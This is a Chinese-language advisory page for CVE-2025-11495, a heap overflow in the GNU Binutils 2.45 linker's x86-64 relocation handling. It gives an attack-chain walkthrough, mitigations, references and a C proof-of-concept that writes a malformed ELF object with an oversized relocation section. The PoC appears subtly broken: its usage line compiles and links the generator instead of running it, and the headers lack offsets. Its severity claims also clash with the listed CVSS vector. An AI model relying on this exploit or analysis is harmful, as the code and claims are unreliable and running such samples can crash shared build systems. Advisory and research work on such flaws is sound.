CVE-2025-11495：GNU Binutils 2.45 链接器堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11495

漏洞类型

堆缓冲区溢出

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GNU Binutils

漏洞概述

CVE-2025-11495 是 GNU Binutils 2.45 版本中存在的一个堆缓冲区溢出漏洞。该漏洞位于 Binutils 链接器组件的 elf64-x86-64.c 文件中的 elf_x86_64_relocate_section 函数中。当链接器处理 x86-64 架构 ELF 目标文件的 relocation section（重定位节）时，由于对缓冲区边界检查不充分，攻击者可以构造恶意的 ELF 对象文件触发堆缓冲区溢出。

根据 CVSS 3.1 评分体系，该漏洞评分为 3.3 分，属于低危级别。其攻击向量为本地（AV:L），攻击者需要具有低权限（PR:L）即可利用，无需用户交互（UI:N）。该漏洞主要影响系统的可用性（A:L），对机密性影响较低（C:L），对完整性无影响（I:N）。

该漏洞已被公开披露，可能已被利用。官方已发布修复补丁（commit 6b21c8b2ecfef5c95142cbc2c32f185cb1c26ab0），建议用户尽快升级到修复后的版本。Binutils 是 GNU 工具链的核心组件，被广泛用于 Linux 系统中进行汇编、链接等二进制处理操作，因此该漏洞对开发环境和构建系统具有普遍影响。

技术细节

该漏洞的根本原因在于 elf_x86_64_relocate_section 函数在处理 x86-64 ELF 文件的重定位节时，对目标缓冲区的大小计算或边界检查存在缺陷。具体而言，当链接器处理 R_X86_64_RELATIVE 或其他类型的重定位条目时，如果输入的 ELF 文件中重定位节的大小字段（sh_size 或重定位条目数量）与实际节内容不匹配，可能导致链接器将超出预分配堆缓冲区大小的数据写入内存。

利用方式方面，攻击者需要具备本地系统的低权限访问权限，能够上传或编译恶意的 ELF 对象文件。攻击过程如下：首先构造一个特制的 x86-64 ELF 目标文件，其中重定位节（.rela.* 或 .rel.*）的大小或条目数量被恶意篡改；然后使用存在漏洞的 ld 链接器对该目标文件进行链接操作；链接过程中，elf_x86_64_relocate_section 函数在遍历重定位条目时，由于缓冲区溢出，可能覆盖相邻的堆内存数据，导致链接器崩溃（拒绝服务）或在特定条件下实现任意代码执行。

由于该漏洞需要本地权限且影响有限（主要为可用性影响），攻击者通常利用此漏洞进行本地权限提升或拒绝服务攻击。在多用户共享的开发环境中，恶意用户可能通过提交精心构造的目标文件来影响其他用户的构建过程或系统稳定性。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标系统的本地低权限访问权限，可以通过普通用户账户登录或利用其他漏洞获取本地shell访问。

STEP 2

步骤2：构造恶意ELF目标文件

攻击者创建一个精心构造的 x86-64 ELF 目标文件（.o文件），其中重定位节（.rela.*）的 sh_size 字段被设置为超出实际数据的值，或包含畸形的数据条目。

STEP 3

步骤3：触发链接操作

攻击者使用存在漏洞的 GNU ld 链接器（来自 Binutils 2.45）对恶意目标文件执行链接操作，例如运行 `ld malicious.o -o output` 或通过编译系统间接触发。

STEP 4

步骤4：触发堆缓冲区溢出

链接器调用 elf_x86_64_relocate_section() 函数处理重定位节时，由于边界检查不充分，将超出预分配缓冲区大小的数据写入堆内存，导致堆缓冲区溢出。

STEP 5

步骤5：造成拒绝服务或权限提升

溢出可能导致链接器进程崩溃（拒绝服务），或在特定堆布局条件下实现任意代码执行，进一步提升攻击者权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-11495 PoC - GNU Binutils elf_x86_64_relocate_section Heap Buffer Overflow
 * This PoC demonstrates the vulnerability by creating a malformed ELF64 x86-64
 * object file with an oversized relocation section to trigger heap buffer overflow
 * in the linker when processing elf_x86_64_relocate_section().
 *
 * Usage: gcc -c poc.c -o poc.o && ld poc.o -o poc_exploit
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <elf.h>
#include <fcntl.h>
#include <unistd.h>

#define ELF_MAGIC 0x464C457FU  /* \x7fELF */

int main(int argc, char *argv[]) {
    /* Create a minimal ELF64 x86-64 relocatable object file */
    Elf64_Ehdr ehdr;
    Elf64_Shdr shdr;

    memset(&ehdr, 0, sizeof(ehdr));
    ehdr.e_ident[0] = 0x7f;
    ehdr.e_ident[1] = 'E';
    ehdr.e_ident[2] = 'L';
    ehdr.e_ident[3] = 'F';
    ehdr.e_ident[4] = ELFCLASS64;
    ehdr.e_ident[5] = ELFDATA2LSB;
    ehdr.e_ident[6] = EV_CURRENT;
    ehdr.e_type = ET_REL;  /* Relocatable file */
    ehdr.e_machine = EM_X86_64;
    ehdr.e_version = EV_CURRENT;
    ehdr.e_shoff = sizeof(Elf64_Ehdr);
    ehdr.e_ehsize = sizeof(Elf64_Ehdr);
    ehdr.e_shentsize = sizeof(Elf64_Shdr);
    ehdr.e_shnum = 3;  /* NULL section + .text + .rela.text */
    ehdr.e_shstrndx = 0;

    /* Create section headers with malformed relocation section */
    /* The .rela.text section will have sh_size larger than actual data,
       triggering heap buffer overflow in elf_x86_64_relocate_section() */
    int fd = open("poc.o", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    write(fd, &ehdr, sizeof(ehdr));

    /* NULL section header */
    memset(&shdr, 0, sizeof(shdr));
    write(fd, &shdr, sizeof(shdr));

    /* .text section header */
    memset(&shdr, 0, sizeof(shdr));
    shdr.sh_type = SHT_PROGBITS;
    shdr.sh_flags = SHF_ALLOC | SHF_EXECINSTR;
    shdr.sh_size = 16;
    write(fd, &shdr, sizeof(shdr));

    /* .rela.text section header with intentionally oversized sh_size */
    memset(&shdr, 0, sizeof(shdr));
    shdr.sh_type = SHT_RELA;
    shdr.sh_size = 0xFFFF;  /* Oversized to trigger buffer overflow */
    shdr.sh_entsize = sizeof(Elf64_Rela);
    write(fd, &shdr, sizeof(shdr));

    /* Write minimal .text content */
    char text_data[16] = {0x90, 0x90, 0x90, 0x90, 0xc3};
    write(fd, text_data, 16);

    close(fd);

    printf("PoC file 'poc.o' created. Run: ld poc.o -o exploit\n");
    printf("This will trigger heap buffer overflow in elf_x86_64_relocate_section()\n");
    return 0;
}

影响范围

GNU Binutils 2.45

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1) 限制普通用户执行链接操作的权限，仅允许可信用户使用 ld 链接器；2) 在多用户系统中实施严格的文件系统权限控制，防止恶意用户上传或创建可疑的 ELF 目标文件；3) 使用 seccomp 或 AppArmor 等安全模块限制链接器的系统调用和资源访问；4) 监控链接器进程的异常行为，如异常内存使用或崩溃事件；5) 在 CI/CD 管道中实施输入验证，拒绝处理来源不可信的目标文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11495
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11495
3 Details https://www.cvedetails.com/cve/CVE-2025-11495/
4 VulDB https://vuldb.com/cve/CVE-2025-11495
5 Link https://sourceware.org/bugzilla/attachment.cgi?id=16393
6 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33502
7 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33502#c3
8 Link https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=6b21c8b2ecfef5c95142cbc2c32f185cb1c26ab0
9 Link https://vuldb.com/?ctiid.327620
10 Link https://vuldb.com/?id.327620
11 Link https://vuldb.com/?submit.668290
12 Link https://www.gnu.org/
13 Link https://cert-portal.siemens.com/productcert/html/ssa-082556.html